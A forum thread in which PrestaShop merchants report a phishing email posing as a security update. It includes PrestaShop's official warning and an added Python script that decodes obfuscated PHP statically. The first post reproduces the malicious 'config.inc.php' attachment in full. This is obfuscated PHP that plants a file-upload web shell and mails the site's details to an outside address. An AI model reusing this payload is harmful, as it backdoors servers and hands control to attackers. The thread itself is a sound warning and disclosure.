nuno.note Posted March 12, 2021

Prestashop <[email protected]>
dkim = pass [email protected] header.s = 657wrrdpqxpxc4dyj324zbvh23phhc6f header.b = d9j9BT7P; dkim = pass [email protected] header.s = shh3fegwg5fppqsuzphvschd53n6ihuv header.b = m8vP0JQv; arc = pass (i = 1 spf = pass spfdomain = eu-west-1.amazonses.com dkim = pass dkdomain =);

Following an error concerning a security file linked to CVE-2021-E49. We have attached the configuration file to update. Replace config.inc.php from the config folder with the attached file, We apologize for the inconvenience caused

<?php fwrite(fopen(base64_decode('Y29udHJvbGxlcnMvZnJvbnQvSW52b2ljZUNvbnRyb2xsZXIucGhw'),base64_decode('dys=')),base64_decode('PD9waHAgaWYoaXNzZXQoJF9HRVRbImhhaGFoYWhhIl0pKXtlY2hvIjxjZW50ZXI+PGZvbnQgY29sb3I9I0ZGRkZGRj5bdW5hbWVdIi5waHBfdW5hbWUoKS4iWy91bmFtZV0iO2VjaG8iPGJyPjxmb250IGNvbG9yPSNGRkZGRkY+W2Rpcl0iLmdldGN3ZCgpLiJbL2Rpcl0iO2VjaG8iPGZvcm0gbWV0aG9kPXBvc3QgZW5jdHlwZT1tdWx0aXBhcnQvZm9ybS1kYXRhPiI7ZWNobyI8aW5wdXQgdHlwZT1maWxlIG5hbWU9Zj48aW5wdXQgbmFtZT12IHR5cGU9c3VibWl0IGlkPXYgdmFsdWU9dXA+PGJyPiI7aWYoJF9QT1NUWyJ2Il09PXVwKXtpZihAY29weSgkX0ZJTEVTWyJmIl1bInRtcF9uYW1lIl0sJF9GSUxFU1siZiJdWyJuYW1lIl0pKXtlY2hvIjxiPlN1Y2Nlc3M8L2I+LS0+Ii4kX0ZJTEVTWyJmIl1bIm5hbWUiXTt9ZWxzZXtlY2hvIjxiPkZhaWxlZCI7fX19'));$c0=base64_decode('ZGVlemVydGVzdHNAeWFuZGV4LnJ1');$o1=base64_decode('Tk9VVkVBVSBQUkVTVEEgLT4g').$_SERVER[base64_decode('U0VSVkVSX05BTUU=')];$i2=base64_decode('ZnJvbTogQ0RMQiA8Y29uZmlncHJlc3RhQG1zLnNrPg==');$n3=base64_decode('TGluayA6IGh0dHA6Ly8=').$_SERVER[base64_decode('U0VSVkVSX05BTUU=')].$_SERVER[base64_decode('UkVRVUVTVF9VUkk=')].base64_decode('DQo=');$n3.=base64_decode('UGF0aCA6IA==').__file__.base64_decode('ICgvY29udHJvbGxlcnMvZnJvbnQvSW52b2ljZUNvbnRyb2xsZXIucGhwP2hhaGFoYWhhKQ==');$d4=@mail($c0,$o1,$n3,$i2);$l5=@mail($c0,$o1,$n3,$i2);?>
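Added example, not part of the original post and not PrestaShop code: a static triage sketch in Python for a PHP file received as a "configuration update", like the attachment quoted above. It decodes `base64_decode('...')` string literals and lists file-write and mail calls without executing anything; the function name `triage_php`, the call list and the sample input are assumptions made for this illustration.

```python
import base64
import re

# Calls that do not belong in a file presented as a plain configuration file.
RISKY_CALLS = ("eval", "file_put_contents", "fopen", "fwrite", "mail")
CALL_RE = re.compile(r"\b(" + "|".join(RISKY_CALLS) + r")\s*\(")
B64_RE = re.compile(r"base64_decode\(\s*(['\"])([A-Za-z0-9+/=]+)\1\s*\)")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
PHP_PATH_RE = re.compile(r"[\w./-]+\.php\b")


def triage_php(source: str) -> dict:
    """Inspect PHP text statically; nothing from the file is executed."""
    decoded = []
    for _quote, literal in B64_RE.findall(source):
        try:
            raw = base64.b64decode(literal, validate=True)
        except ValueError:  # malformed base64: leave for manual review
            continue
        decoded.append(raw.decode("utf-8", errors="replace"))
    calls = sorted(set(CALL_RE.findall(source)))
    return {
        "calls": calls,
        "decoded": decoded,
        "emails": sorted({m for d in decoded for m in EMAIL_RE.findall(d)}),
        "php_paths": sorted({m for d in decoded for m in PHP_PATH_RE.findall(d)}),
        # Hidden string literals combined with file-write or mail calls
        "suspicious": bool(decoded) and bool(calls),
    }


def _b64(text: str) -> str:
    return base64.b64encode(text.encode()).decode()


# Constructed sample shaped like the quoted attachment; every value is a harmless placeholder.
SAMPLE = (
    "<?php fwrite(fopen(base64_decode('" + _b64("demo/placeholder.php") + "'),"
    "base64_decode('" + _b64("w+") + "')),"
    "base64_decode('" + _b64("<?php echo 'placeholder'; ?>") + "'));"
    "$to=base64_decode('" + _b64("analyst@example.invalid") + "');"
    "@mail($to,'subject','body');?>"
)
CLEAN = "<?php define('_DB_SERVER_', 'localhost'); ?>"

if __name__ == "__main__":
    print(triage_php(SAMPLE))
    print(triage_php(CLEAN))
```

A genuine configuration file normally only defines constants, so any encoded literal next to a write or mail call is reason enough to keep the file off the server and report it.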

Hertspartybags Posted March 12, 2021

I have just had the same email as well, wasn't sure if it was legitimate or not.

ecommerce16 Posted March 12, 2021

This is absolutely fake. Prestashop will never send you files by email but will do this with an update! When you check the sender you can also see it's not from Prestashop.

Glamorhair Posted March 15, 2021

Also got this email. I checked, and the email address looks wrong: "[email protected] via amazonses.com". None of Prestashop's email ever comes from this.

ecommerce16 Posted March 18, 2021

This is the official reaction of Prestashop:

Hello,

This message is to inform you that several members of our community have received an email containing a phishing attempt, pretending to be a message from PrestaShop. This message, containing "Security Alert ↗" in its subject line, is not a PrestaShop message and is in no way affiliated with PrestaShop. This message is still appearing in the inboxes of our community members. As soon as PrestaShop was informed of this malicious action, we alerted our users as soon as possible via social media and this email.

If you received this message, there is no risk for you, but we recommend deleting it from your email’s inbox.

If you downloaded the file attached to it on your computer, there is nothing to worry about, but we recommend deleting the file from your device, and deleting the email from your inbox.

If you followed all the instructions of this fraudulent email and uploaded this file to your server, please contact us as soon as possible.

If you did not receive this email, please stay vigilant for potential phishing attempts in the future.

PrestaShop never sends files, documents or Zip folders by email and will never do so. PrestaShop will never ask you for your password, and all emails from PrestaShop regarding a security issue will link to PrestaShop's website: prestashop.com, and will not contain any specific instruction within the message.

Of course PrestaShop takes this kind of event very seriously and we encourage all community members to stay alert for such attempts such as phishing, which we have unfortunately no control over.

▶ Read on fbi.gov: How to protect yourself against phishing

We will keep you informed of any future development as soon as we can, and we are working hard to fight against any future fraud attempts.

Thank you for being cautious and for your understanding.

The PrestaShop team.